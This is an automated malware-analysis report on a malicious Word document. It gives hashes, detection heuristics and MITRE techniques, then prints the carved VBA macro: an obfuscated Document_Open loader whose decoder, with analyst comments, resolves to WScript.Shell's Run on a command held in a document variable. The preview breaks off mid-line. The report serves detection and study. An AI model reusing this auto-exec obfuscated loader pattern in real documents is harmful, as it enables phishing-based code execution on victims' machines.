Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9e81657347bd10e9…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 136.0 KB
Created: 2018-10-23 00:06:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: 6a82ee76b4079c545ed72fb4b8ea18f4
SHA-1: e979551b893342e7c8fe56613b9ad818ce4b5cb2
SHA-256: 9e81657347bd10e9f214b01e99089e7d9fba91194eab2745fe04ae7fa4db5fed
Risk score: 302

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro that is obfuscated and uses an auto-exec function (Document_Open) to initiate execution. The macro employs CreateObject and CallByName, indicative of attempts to execute arbitrary code. The ClamAV detection name 'Doc.Malware.Valyria-6749505-0' further confirms its malicious nature. The primary attack pattern involves leveraging the macro to execute a payload, likely for further system compromise.

Heuristics (8)

  • ClamAV: Doc.Malware.Valyria-6749505-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6749505-0
  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    The document contains VBA macro code.
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    An auto-exec VBA routine reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    The document defines a Document_Open macro, which runs automatically when the document is opened.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    The macro calls CreateObject (COM object instantiation).
  • CallByName call [high] OLE_VBA_CALLBYNAME
    The macro calls CallByName (late-bound method invocation by string name).
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4564 bytes
SHA-256: 487dfaccb548302b003cdc4a47acdc6bfca27a5f1104f7de4311f2ce0b23b3e7

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
' Analyst note (editorial comment, not part of the carved sample): SS_ is the string decoder.
' Chr(23 + 18 - 3) is Chr(38) = "&" and Chr(60 + 16 - 12 + 8) is Chr(72) = "H", so every
' two-character slice of the input is parsed as a hex byte via Val("&H..") and 78 is
' subtracted to recover the plaintext character.
Private Function SS_(ByVal KI_ As String)
Dim BF_ As String: Dim GD_ As Long: For GD_ = 1 To Len(KI_) Step 2: BF_ = BF_ & Chr(Val(Chr(23 + (9 * 2) - (1 * 3)) & Chr((20 * 3) + 16 - (24 / 2) + 8) & Mid(KI_, GD_, 2)) - 78): Next: SS_ = BF_
End Function
Sub Document_Open()
Dim JOUA_ As Long: JOUA_ = 78
Dim YUVMXF_ As Long
Select Case JOUA_
Case 54 Xor Round(3276 Xor 2145) Xor 9 - (16 + 78) - 57 * Round(17 / 54 - 93) * 50
YUVMXF_ = 8809 - 39
Case 35 + (60 - 95) + 85 / Round(37 * 39 / 14) / 89
YUVMXF_ = 8825 * 70
Case 62 + (39 - 66) + 49 - (96 + 53) - 40 / Round(84 * 89 / 26) / 20
YUVMXF_ = 4526 * 80
Case 14 - (49 + 26) - 60 Xor Round(2705 Xor 2547) Xor 79
YUVMXF_ = 3333 - 22
Case 68 Xor Round(1378 Xor 5970) Xor 41 + (60 - 54) + 25 Xor Round(38 Xor 71) Xor 20
YUVMXF_ = 5006 Xor 17
Case 25 / Round(71 * 97 / 94) / 93 - (52 + 55) - 13
YUVMXF_ = 2723 * 66
Case 14 - (21 + 88) - 71 Xor Round(59 Xor 3210) Xor 46 + (83 - 57) + 13
YUVMXF_ = 4341 / 37
Case 11 Xor Round(1506 Xor 1280) Xor 11 / Round(91 * 73 / 60) / 54 * Round(21 / 85 - 90) * 37
YUVMXF_ = 2203 / 96
Case 55 - (68 + 97) - 99 Xor Round(3252 Xor 1927) Xor 93
YUVMXF_ = 2601 - 85
Case 69 - (18 + 83) - 85 - (39 + 45) - 28
YUVMXF_ = 1482 - 15
Case 15 * Round(17 / 97 - 42) * 72 Xor Round(4436 Xor 5508) Xor 25 * Round(87 / 54 - 14) * 67
YUVMXF_ = 4929 * 86
Case 69 Xor Round(1612 Xor 3475) Xor 79 / Round(47 * 31 / 20) / 96
YUVMXF_ = 8631 / 71
Case 9 - (94 + 93) - 97 Xor Round(2692 Xor 4317) Xor 12 - (57 + 36) - 29
YUVMXF_ = 6863 + 19
Case 19 Xor Round(1116 Xor 2976) Xor 93 * Round(62 / 60 - 37) * 96 * Round(88 / 60 - 68) * 76
YUVMXF_ = 2907 * 12
' Analyst note (editorial comment, not part of the carved sample): JOUA_ is fixed at 78, so
' this is the only Case arm that executes; the surrounding arithmetic Case arms are dead noise.
' SS_("A5A1B1C0B7BEC27CA1B6B3BABA") decodes to "WScript.Shell" and SS_("A0C3BC") to "Run".
' The command passed to Run is decoded from the document variable LBVFFJHN, whose value is
' not part of this extraction, so the actual command line is not recoverable from the source alone.
Case 78:
CallByName CreateObject(SS_("A5A1B1C0B7BEC27CA1B6B3BABA")), SS_("A0C3BC"), VbMethod, SS_(ActiveDocument.Variables("LBVFFJHN").Value), 0, True
Case 22 / Round(83 * 76 / 86) / 26 * Round(30 / 89 - 78) * 47 * Round(13 / 86 - 43) * 95
YUVMXF_ = 6744 * 73
Case 48 / Round(9 * 95 / 81) / 64 Xor Round(4663 Xor 431) Xor 44
YUVMXF_ = 8150 / 75
Case 63 - (67 + 19) - 22 - (12 + 50) - 14
YUVMXF_ = 8351 + 63
Case 72 + (17 - 25) + 79 / Round(82 * 95 / 53) / 67
YUVMXF_ = 7701 Xor 65
Case 80 + (38 - 42) + 38 Xor Round(3502 Xor 5458) Xor 39 Xor Round(4539 Xor 4410) Xor 52
YUVMXF_ = 4757 * 70
Case 25 / Round(77 * 85 / 23) / 69 - (27 + 53) - 48 + (14 - 47) + 15
YUVMXF_ = 592 * 32
Case 87 + (82 - 12) + 77 + (38 - 52) + 95 * Round(36 / 60 - 61) * 57
YUVMXF_ = 7815 * 48
Case 86 + (80 - 69) + 13 + (48 - 17) + 43 Xor Round(859 Xor 4045) Xor 11
YUVMXF_ = 8383 + 29
Case 10 - (56 + 77) - 87 / Round(91 * 75 / 75) / 13
YUVMXF_ = 5472 Xor 70
Case 16 + (21 - 12) + 86 Xor Round(1721 Xor 2360) Xor 90 + (94 - 45) + 27
YUVMXF_ = 7675 / 87
Case 92 * Round(43 / 56 - 41) * 67 Xor Round(2898 Xor 4272) Xor 40 Xor Round(55 Xor 742) Xor 77
YUVMXF_ = 5889 + 66
Case 51 - (88 + 81) - 38 - (78 + 39) - 83 + (93 - 70) + 77
YUVMXF_ = 4521 * 31
Case 83 + (23 - 19) + 44 + (86 - 99) + 82 * Round(74 / 85 - 17) * 68
YUVMXF_ = 2933 / 52
Case 43 Xor Round(3262 Xor 484) Xor 49 * Round(22 / 53 - 43) * 89 * Round(19 / 73 - 70) * 93
YUVMXF_ = 2465 Xor 40
Case 41 - (84 + 68) - 87 - (50 + 14) - 99 / Round(34 * 51 / 37) / 66
YUVMXF_ = 3568 Xor 38
Case 65 * Round(98 / 94 - 89) * 43 - (91 + 12) - 55 Xor Round(4342 Xor 3691) Xor 40
YUVMXF_ = 2102 - 92
Case 69 * Round(47 / 28 - 65) * 22 * Round(54 / 71 - 17) * 13
YUVMXF_ = 3720 / 92
Case 88 Xor Round(448 Xor 4657) Xor 21 * Round(49 / 10 - 75) * 79 + (40 - 81) + 45
YUVMXF_ = 4673 * 70
Case 88 - (57 + 83) - 48 / Round(28 * 69 / 72) / 26
YUVMXF_ = 4384 Xor 61
Case 39 / Round(24 * 20 / 51) / 77 / Round(76 * 31 / 76) / 60
YUVMXF_ = 3680 - 18
Case 85 - (37 + 38) - 59 Xor Round(323 Xor 506) Xor 47 Xor Round(4196 Xor 4989) Xor 10
YUVMXF_ = 7878 Xor 63
Case 59 / Round(28 * 71 / 70) / 
... (truncated)